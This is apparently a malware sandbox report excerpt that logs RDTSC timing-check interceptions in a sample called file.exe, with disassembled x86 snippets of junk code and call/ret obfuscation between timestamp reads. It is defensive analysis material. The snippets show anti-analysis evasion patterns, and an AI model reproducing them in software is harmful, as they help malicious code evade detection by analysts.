                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11598B8 second address: 11598D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jnl 00007F5E94757C96h 0x00000011 jbe 00007F5E94757C96h 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159A27 second address: 1159A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5E94E4CBB6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159D27 second address: 1159D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5E94757CA2h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159D40 second address: 1159D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159EAB second address: 1159ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5E94757C96h 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007F5E94757C96h 0x00000013 pop eax 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a jnp 00007F5E94757C9Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115D921 second address: 115D92B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E94E4CBACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115D92B second address: 115D993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jmp 00007F5E94757CA9h 0x0000000c push 00000003h 0x0000000e or edx, 193B9008h 0x00000014 push 00000000h 0x00000016 mov esi, eax 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F5E94757C98h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 or dword ptr [ebp+122D2D40h], eax 0x0000003a push 804A29A1h 0x0000003f push eax 0x00000040 push edx 0x00000041 push edx 0x00000042 je 00007F5E94757C96h 0x00000048 pop edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115D993 second address: 115D9ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F5E94E4CBA6h 0x00000009 jne 00007F5E94E4CBA6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 404A29A1h 0x00000019 jng 00007F5E94E4CBBBh 0x0000001f lea ebx, dword ptr [ebp+1244F786h] 0x00000025 sub dh, FFFFFFA7h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e jmp 00007F5E94E4CBB6h 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DA30 second address: 115DAAC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E94757C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D2D85h], edx 0x00000014 push ebx 0x00000015 jmp 00007F5E94757CA8h 0x0000001a pop edx 0x0000001b push 00000000h 0x0000001d mov di, EF00h 0x00000021 call 00007F5E94757C99h 0x00000026 jmp 00007F5E94757CA1h 0x0000002b push eax 0x0000002c pushad 0x0000002d jne 00007F5E94757C98h 0x00000033 push eax 0x00000034 push esi 0x00000035 pop esi 0x00000036 pop eax 0x00000037 popad 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F5E94757CA9h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DC2D second address: 115DC3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DD71 second address: 115DD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DD75 second address: 115DD91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DD91 second address: 115DD96 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DD96 second address: 115DE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 sbb dx, BF45h 0x0000000d push 00000003h 0x0000000f js 00007F5E94E4CBA6h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F5E94E4CBA8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 push 00000003h 0x00000033 add edx, 39414C39h 0x00000039 call 00007F5E94E4CBA9h 0x0000003e jp 00007F5E94E4CBACh 0x00000044 pushad 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 push eax 0x00000048 pop eax 0x00000049 popad 0x0000004a push eax 0x0000004b push edx 0x0000004c push ecx 0x0000004d push esi 0x0000004e pop esi 0x0000004f pop ecx 0x00000050 pop edx 0x00000051 mov eax, dword ptr [esp+04h] 0x00000055 jbe 00007F5E94E4CBB0h 0x0000005b pushad 0x0000005c push ecx 0x0000005d pop ecx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DE05 second address: 115DE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c jo 00007F5E94757C9Ch 0x00000012 jne 00007F5E94757C96h 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e pushad 0x0000001f push edi 0x00000020 pop edi 0x00000021 jmp 00007F5E94757CA2h 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jbe 00007F5E94757C96h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DE41 second address: 115DE61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 sub dword ptr [ebp+122D2096h], edi 0x0000000e lea ebx, dword ptr [ebp+1244F79Ah] 0x00000014 jc 00007F5E94E4CBA6h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DE61 second address: 115DE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757CA5h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DE7B second address: 115DE93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E94E4CBB4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B37A second address: 117B37E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B37E second address: 117B395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push ecx 0x0000000b js 00007F5E94E4CBA6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B395 second address: 117B3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757CA3h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B941 second address: 117B947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BACC second address: 117BAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F5E94757C9Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BAE0 second address: 117BAE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BBF9 second address: 117BBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BBFD second address: 117BC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BEAD second address: 117BEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757CA9h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F5E94757C9Bh 0x00000010 popad 0x00000011 jmp 00007F5E94757CA1h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C09D second address: 117C0AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C22F second address: 117C233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C4AA second address: 117C4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141514 second address: 1141518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CBCD second address: 117CBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94E4CBAAh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F5E94E4CBB3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CD2C second address: 117CD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5E94757C96h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CD3A second address: 117CD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D049 second address: 117D051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D051 second address: 117D058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D058 second address: 117D07F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E94757C98h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E94757C9Eh 0x0000000f jmp 00007F5E94757C9Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D07F second address: 117D083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117F51E second address: 117F524 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181CD5 second address: 1181CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181E2D second address: 1181E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F5E94757C96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181E3C second address: 1181E64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187BE7 second address: 1187BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757CA2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187BFD second address: 1187C15 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5E94E4CBA6h 0x00000008 jl 00007F5E94E4CBA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F5E94E4CBACh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118805C second address: 1188077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757CA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1188077 second address: 118807B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11881ED second address: 11881F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11881F1 second address: 1188209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBAAh 0x00000007 js 00007F5E94E4CBA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B673 second address: 118B678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B734 second address: 118B738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B738 second address: 118B73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B73E second address: 118B753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F5E94E4CBA6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B753 second address: 118B757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118BDEF second address: 118BDF5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118BEF8 second address: 118BEFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118BEFE second address: 118BF03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C45D second address: 118C48D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007F5E94757C9Bh 0x0000000d xchg eax, ebx 0x0000000e jng 00007F5E94757C97h 0x00000014 mov dword ptr [ebp+122D1BE7h], edx 0x0000001a push eax 0x0000001b jo 00007F5E94757CBBh 0x00000021 push eax 0x00000022 push edx 0x00000023 jnp 00007F5E94757C96h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C670 second address: 118C675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C978 second address: 118C986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 je 00007F5E94757C96h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E906 second address: 118E90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C510 second address: 113C516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D848 second address: 118D84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C516 second address: 113C525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007F5E94757C96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C525 second address: 113C52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C52A second address: 113C530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F04C second address: 118F06F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F5E94E4CBA6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F06F second address: 118F079 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E94757C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F805 second address: 118F819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5E94E4CBADh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191CAC second address: 1191CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191CB0 second address: 1191CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11943FA second address: 119440F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5E94757C9Ch 0x0000000c jp 00007F5E94757C96h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119601E second address: 1196024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196024 second address: 1196028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196028 second address: 119602C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119796B second address: 1197985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5E94757CA1h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197985 second address: 11979A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5E94E4CBAAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c je 00007F5E94E4CBC0h 0x00000012 jo 00007F5E94E4CBACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150572 second address: 115057B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115057B second address: 1150581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119AC95 second address: 119AD30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757C9Ch 0x00000009 popad 0x0000000a jne 00007F5E94757CA1h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 xor ebx, dword ptr [ebp+122D2B35h] 0x0000001a push 00000000h 0x0000001c mov ebx, dword ptr [ebp+122D1B61h] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007F5E94757C98h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e mov ebx, esi 0x00000040 mov dword ptr [ebp+122D2646h], edx 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 pushad 0x00000049 push edx 0x0000004a pop edx 0x0000004b push edx 0x0000004c pop edx 0x0000004d popad 0x0000004e jmp 00007F5E94757CA9h 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 jmp 00007F5E94757CA0h 0x0000005b push eax 0x0000005c push edx 0x0000005d jc 00007F5E94757C96h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1199D90 second address: 1199E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jp 00007F5E94E4CBB9h 0x0000000d popad 0x0000000e push eax 0x0000000f je 00007F5E94E4CBBAh 0x00000015 jmp 00007F5E94E4CBB4h 0x0000001a nop 0x0000001b mov di, cx 0x0000001e push dword ptr fs:[00000000h] 0x00000025 xor dword ptr [ebp+1245F734h], eax 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov edi, 30638B48h 0x00000037 mov eax, dword ptr [ebp+122D0C39h] 0x0000003d push edi 0x0000003e jmp 00007F5E94E4CBACh 0x00000043 pop edi 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push esi 0x00000049 call 00007F5E94E4CBA8h 0x0000004e pop esi 0x0000004f mov dword ptr [esp+04h], esi 0x00000053 add dword ptr [esp+04h], 00000016h 0x0000005b inc esi 0x0000005c push esi 0x0000005d ret 0x0000005e pop esi 0x0000005f ret 0x00000060 push eax 0x00000061 mov edi, eax 0x00000063 pop edi 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 push esi 0x00000069 pop esi 0x0000006a push ebx 0x0000006b pop ebx 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119DD20 second address: 119DD2A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E94757C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119CF3B second address: 119CF40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119CFF4 second address: 119CFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119EE4D second address: 119EE67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119EE67 second address: 119EE6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
